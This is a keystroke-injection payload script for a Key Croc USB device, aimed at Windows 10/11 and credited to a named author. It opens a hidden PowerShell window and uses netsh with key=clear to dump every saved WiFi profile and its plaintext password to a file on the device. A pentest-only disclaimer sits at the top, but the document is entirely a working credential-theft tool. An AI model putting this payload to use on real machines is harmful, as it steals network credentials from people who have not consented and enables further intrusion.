#!/bin/bash
# Title: WiFi Password Dump
# Author: David Osisek (CamoZeroDay)
# Target: Windows 10/11
# Version: 1.0
# Category: Credential Access
# 
# ⚠️ FOR AUTHORIZED PENETRATION TESTING ONLY
# Dumps all saved WiFi passwords

LED SETUP

ATTACKMODE HID STORAGE

LED STAGE1
Q DELAY 2000

LED STAGE2
Q GUI r
Q DELAY 500
Q STRING powershell -WindowStyle Hidden
Q ENTER
Q DELAY 1500

# Get destination
LED STAGE3
Q STRING \$dest=(Get-Volume | Where-Object {\$_.DriveType -eq 'Removable' -and \$_.FileSystemLabel -eq 'KEYCROC'}).DriveLetter
Q ENTER
Q STRING \$out="\${dest}:\\wifi-passwords.txt"
Q ENTER
Q DELAY 500

# Header
Q STRING '=== WIFI PASSWORD DUMP ===' | Out-File \$out
Q ENTER
Q STRING 'Computer: '+(Get-WmiObject Win32_ComputerSystem).Name | Out-File -Append \$out
Q ENTER
Q STRING 'Date: '+(Get-Date) | Out-File -Append \$out
Q ENTER
Q STRING '' | Out-File -Append \$out
Q ENTER

# Get all WiFi profiles and passwords
Q STRING \$profiles=(netsh wlan show profiles) | Select-String 'All User Profile' | ForEach-Object{\$_.ToString().Split(':')[1].Trim()}
Q ENTER
Q DELAY 500

Q STRING foreach(\$profile in \$profiles){
Q ENTER
Q STRING \$info=netsh wlan show profile name=\$profile key=clear
Q ENTER
Q STRING '' | Out-File -Append \$out
Q ENTER
Q STRING "Profile: \$profile" | Out-File -Append \$out
Q ENTER
Q STRING \$info | Select-String 'SSID name','Authentication','Cipher','Key Content' | Out-File -Append \$out
Q ENTER
Q STRING '---' | Out-File -Append \$out
Q ENTER
Q STRING }
Q ENTER
Q DELAY 2000

# Exit
Q STRING exit
Q ENTER

LED FINISH
Q DELAY 1000

sync
